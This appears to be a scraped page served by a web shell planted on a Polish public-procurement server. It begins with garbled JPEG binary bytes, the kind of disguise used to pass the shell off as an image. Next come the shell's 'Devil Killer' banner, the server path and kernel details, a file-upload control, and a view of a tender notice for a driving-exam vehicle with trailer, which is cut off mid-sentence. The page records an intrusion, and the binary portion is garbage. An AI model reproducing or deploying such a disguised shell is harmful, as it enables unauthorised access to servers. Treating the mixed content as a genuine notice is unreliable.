JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241016/0054943301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa w 2024r. pojazdu egzaminacyjnego wraz z przyczepą na potrzeby prowadzenia egzaminów praktycznych na prawo jazdy kat. B+E i B96 przez Wojewódzki Ośrodek Ruchu Drogowego w Bielsku-Białej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKI OŚRODEK RUCHU DROGOWEGO W BIELSKU-BIAŁEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072105898</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Armii Krajowej 220A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-316</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wat@word.bielsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.word.bielsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Egzaminy Państwowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa w 2024r. pojazdu egzaminacyjnego wraz z przyczepą na potrzeby prowadzenia egzaminów praktycznych na prawo jazdy kat. B+E i B96 przez Wojewódzki Ośrodek Ruchu Drogowego w Bielsku-Białej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b6db494-9710-4269-bb25-be665587e193</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00549433</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00213512/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 „Dostawa w 2024r. pojazdu egzaminacyjnego wraz z przyczepą na potrzeby prowadzenia egzaminów praktycznych na prawo jazdy kat. B+E i B96 przez Wojewódzki Ośrodek Ruchu Drogowego w Bielsku-Białej”,</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4b6db494-9710-4269-bb25-be665587e193 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu komunikacja, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej, tj.:<br/> 1) przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem:<br/>https://ezamowienia.gov.pl/<br/>2) poczty elektronicznej pod adresem: wat@word.bielsko.pl .</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Składanie ofert odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl/ na zasadach określonych w Rozdziale XVI Specyfikacji. <br/> 2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa „Regulamin Platformy e-Zamówienia”, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/> 3. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/> 4. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa „Regulamin Platformy e-Zamówienia”.<br/> 5. Maksymalny rozmiar plików przesyłanych jako załączniki do jednego formularza za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB;<br/> 6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Platformę e-Zamówienia, bądź na wskazane adresy poczty elektronicznej Zamawiającego lub Wykonawcy.<br/> 7. Sposób komunikowania się Zamawiającego z Wykonawcami (z wyłączeniem składania ofert):<br/> 1) w postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie oświadczeń, wniosków (innych niż wskazane w Rozdziale XVI ), zawiadomień, wezwań oraz przekazywanie informacji odbywać się będzie:<br/> a) za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na Platformie e-Zamówienia. W takim przypadku we wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia w Biuletynie Zamówień Publicznych lub ID postępowania,<br/> b) za pomocą poczty elektronicznej pod adresem wat@word.bielsko.pl W takim przypadku Zamawiający i Wykonawcy będą posługiwać się numerem referencyjnym postępowania WORD-WAT-3231-2/24,<br/> 2) dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza składanie dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt 1 lit. b adres poczty elektronicznej. <br/> 3) Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowanie) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415 ze zm.),<br/> 4) Dokumenty elektroniczne, o których mowa w § 2 ust 1 Rozporządzenia Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności z uwzględnieniem rodzaju przekazywanych danych i przekazuje jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WORD-WAT-3231-2/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa jednego zespołu pojazdów, na który składa się samochód osobowy oraz przyczepa, będący pojazdem egzaminacyjnym, na potrzeby prowadzenia egzaminów praktycznych na prawo jazdy kat. B+E i B96, dla Wojewódzkiego Ośrodka Ruchu Drogowego w Bielsku-Białej. Zespół pojazdów musi spełniać warunki techniczne obowiązujące na terenie Polski oraz wymagania właściwe ze względu na przeznaczenie pojazdu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144000-8 - Pojazdy silnikowe specjalnego zastosowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34110000-1 - Samochody osobowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie poniższych kryteriów:<br/> 1) cena oferty brutto („KC”) 1)	-	waga 60 pkt<br/> 2) okres gwarancji na silnik i podzespoły mechaniczne, elektryczne i elektroniczne bez limitu kilometrów („KOg”) 3) – waga 40 pkt<br/> 1) do oceny ofert Zamawiający przyjmie cenę brutto oferty za cały zakres zamówienia. <br/> 2) okres gwarancji - wybrany przez Wykonawcę, z tym, że nie krótszy niż 24 miesięcy, licząc od daty podpisania protokołu odbioru przedmiotu zamówienia. Oferty z okresem krótszym niż okres wymagany 24 miesięcy będą odrzucone na podstawie art. 226 ust. 1 pkt 5 ustawy, jako niezgodne z warunkami zamówienia. Wykonawca zobowiązany jest do podania terminu w miesiącach. <br/> 2. Kryterium ceny brutto KC będzie wyliczane wg wzoru:<br/> 1) ofercie najtańszej przyznaje się maksymalną liczbę punktów – 60, i wylicza się kryterium KC wg wzoru:<br/><br/>gdzie:<br/>Con - cena oferty najtańszej<br/> 2) każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/><br/>gdzie:<br/>Con - cena oferty najtańszej <br/>Coo - cena oferty ocenianej <br/> 3. Kryterium okresu gwarancji KOg będzie wyliczane wg wzoru:<br/> 1) ofercie z najdłuższym okresie gwarancji przyznaje się maksymalną liczbę punktów – 40, i wylicza się kryterium KOrg wg wzoru:<br/><br/>gdzie:<br/>Gon – najdłuższy zaoferowany okres gwarancji<br/> 2) każdej następnej ofercie przyznaje się liczbę punktów proporcjonalnie niższą, wyliczoną wg wzoru:<br/><br/>gdzie:<br/>Goo – okres gwarancji w ofercie ocenianej<br/>Gon – najdłuższy zaoferowany okres gwarancji,<br/> 4. Za najkorzystniejszą ofertę Zamawiający uzna ofertę przedstawiającą najkorzystniejszy bilans kryteriów oceny ofert, wyliczony wg wzoru:<br/>PO = KC + KOg</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na silnik i podzespoły mechaniczne, elektryczne i elektroniczne bez limitu kilometrów (KOg)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Odpisu lub aktualnej informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>W przypadku oferty wspólnej ww. odpis lub informacje składa każdy z Wykonawców składających ofertę wspólną. W przypadku Wykonawcy będącym Spółką cywilną, każdy ze Wykonawców składa odpisy oddzielnie dla każdego ze wspólników spółki cywilnej.<br/>2) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 pkt 5-6 ustawy.<br/>W przypadku oferty wspólnej ww. oświadczenie składa każdy z Wykonawców składających ofertę wspólną. W przypadku Wykonawcy będącym Spółką cywilną, każdy z Wykonawców składa oświadczenie oddzielnie dla każdego ze wspólników spółki cywilnej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe, o których mowa w art. 104-107 ustawy, w przypadku zastosowania w ofercie rozwiązań równoważnych, tj.:<br/>a) wykaz innych równoważnych rozwiązań, którego wzór stanowi załącznik nr 3 do Specyfikacji, oraz<br/>b) dokumenty potwierdzające równoważność zaproponowanych rozwiązań w stosunku do określonych w Opisie przedmiotu zamówienia i SWZ, potwierdzające, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia i SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. OFERTA oraz dokumenty składane wraz z ofert:<br/> 1) „Formularz ofertowy” – interaktywny formularz udostępniony przez Zamawiającego na stronie prowadzonego postępowania na Platformie e-Zamówienia, sporządzony w sposób określony w Rozdziale XVI Specyfikacji;<br/> 2) Formularz kalkulacji ceny sporządzony na zasadach określonych w Rozdziale VIII Specyfikacji, którego wzór stanowi załącznik nr 1a do Specyfikacji, Formularz kalkulacji ceny stanowi treść oferty i w przypadku gdy Wykonawca nie złoży wraz z ofertą Formularza kalkulacji ceny lub Formularz ten nie będzie wypełniony i/lub podpisany zgodnie z wytycznymi zawartymi w ust. 8 niniejszego rozdziału oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy jako niezgodna z warunkami zamówienia;<br/> 3) Formularz specyfikacji technicznej zespołu pojazdów (wypełniona tabela), sporządzony wg wzoru stanowiącego załącznik nr 1b do Specyfikacji <br/>Wykonawca wypełnia wszystkie pozycje zawarte w Formularzu. W przypadku niewypełnienia którejkolwiek z pozycji zawartych w Formularzu Zamawiający uzna, że przedmiot zamówienia oferowany przez Wykonawcę posiada parametry zgodne z wymaganymi przez Zamawiającego parametrami zawartymi w dokumentach zamówienia, w tym w niniejszym Formularzu. <br/>Formularz specyfikacji technicznej zespołu pojazdów stanowi treść oferty i w przypadku gdy Wykonawca nie złoży wraz z ofertą Formularza specyfikacji technicznej (…) lub Formularz ten nie będzie podpisany zgodnie z wytycznymi zawartymi w ust. 8 niniejszego rozdziału oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy jako niezgodna z warunkami zamówienia;<br/> 4) oświadczenie Wykonawcy dotyczące braku podstaw wykluczenia z postępowania oraz spełniania warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy, sporządzone na formularzu stanowiącym załącznik nr 4 do Specyfikacji,<br/> 5) (jeśli dotyczy) pełnomocnictwo lub inny dokument potwierdzający umocowanie osoby/osób podpisującej/cych ofertę do reprezentowania Wykonawcy o ile nie wynika to z innych dokumentów załączonych przez Wykonawcę, <br/> 6) (jeżeli dotyczy) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/> 7) (jeśli dotyczy) oświadczenie wykonawców wspólnie ubiegających się o zamówienie złożone w myśl postanowień art. 117 ust. 4 ustawy, z którego wynika które zakresy dostawy wykonają poszczególni Wykonawcy na wzorze, który stanowi załącznik nr 5 do Specyfikacji.<br/> 8) potwierdzenie wniesienia wadium – oryginalny dokument elektroniczny potwierdzający wniesienie wadium w formie innej niż pieniądz, w przypadku gdy Wykonawca składa wadium w tej formie (poręczenie, gwarancja), sporządzony zgodnie z wymaganiami określonymi w Rozdziale XIX SWZ. W przypadku wniesienia wadium w pieniądzu na rachunek bankowy Zamawiającego, Wykonawca dołącza do oferty potwierdzenie przelewu w postaci elektronicznej.;<br/> 9) (jeśli dotyczy) uzasadnienie, w którym wykazano, ze zastrzeżone informacje przekazane wraz z ofertą stanowią tajemnice przedsiębiorstwa;<br/> 10) (jeśli dotyczy) przedmiotowe środki dowodowe, o których mowa w art. 104 – 107 ustawy, w przypadku zastosowania o ofercie rozwiązań równoważnych, tj:<br/> a) wykaz innych, równoważnych rozwiązań, którego wzór stanowi załącznik nr 3 do Specyfikacji, oraz<br/> b) dowolne dokumenty potwierdzające równoważność zaproponowanych rozwiązań w stosunku do określonych w Opisie przedmiotu zamówienia i SWZ, potwierdzające, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia i SWZ;<br/> 11) W przypadku złożenia oferty wspólnej przez kilku przedsiębiorców (konsorcjum lub spółka cywilna), każdy z Wykonawców (członków konsorcjum, wspólników spółki cywilnej), indywidualnie składa oświadczenie dotyczące braku podstaw wykluczenia z postępowania, o którym mowa w pkt 3. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga, aby oferta była zabezpieczona wadium w wysokości 2400 zł (słownie: dwa tysiące czterysta złotych).<br/> 1. Wadium może być wniesione w następujących formach:<br/> 1) pieniądzu,<br/> 2) poręczeniach bankowych lub poręczeniu spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/> 3) gwarancjach bankowych,<br/> 4) gwarancjach ubezpieczeniowych,<br/> 5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/> 3. Oferta Wykonawcy, który nie wniósł wymaganego wadium lub wadium wniesione zostało nieprawidłowo, zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy.<br/> 4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego nr 40 2030 0045 1110 0000 0068 5660 wskazując w opisie przelewu „wadium w postępowaniu na dostawę pojazdu na kat. BE dla WORD w Bielsku-Białej” przed upływem terminu składania ofert. Wadium w pieniądzu jest wpłacone w terminie, jeżeli przed upływem terminu składania ofert wpłacona przez Wykonawcę kwota, zostanie zaksięgowana przez bank na rachunku Zamawiającego. Złożenie dyspozycji wpłaty wadium w dniu składania ofert, nie gwarantuje dotrzymania terminu wniesienia wadium;<br/> 5. Dowód wpłacenia wadium powinien być dołączony do oferty.<br/> 6. W przypadku wnoszenia wadium w formie innej niż pieniężna dokument poręczenia lub gwarancji powinien zawierać informację o udzieleniu poręczenia lub gwarancji na rzecz Zamawiającego tytułem zapłaty wadium w postępowaniu o udzielenie zamówienia, którego przedmiotem jest: „Dostawa w 2024r. pojazdu egzaminacyjnego wraz z przyczepą na potrzeby prowadzenia egzaminów praktycznych na prawo jazdy kat. B+E i B96 przez Wojewódzki Ośrodek Ruchu Drogowego w 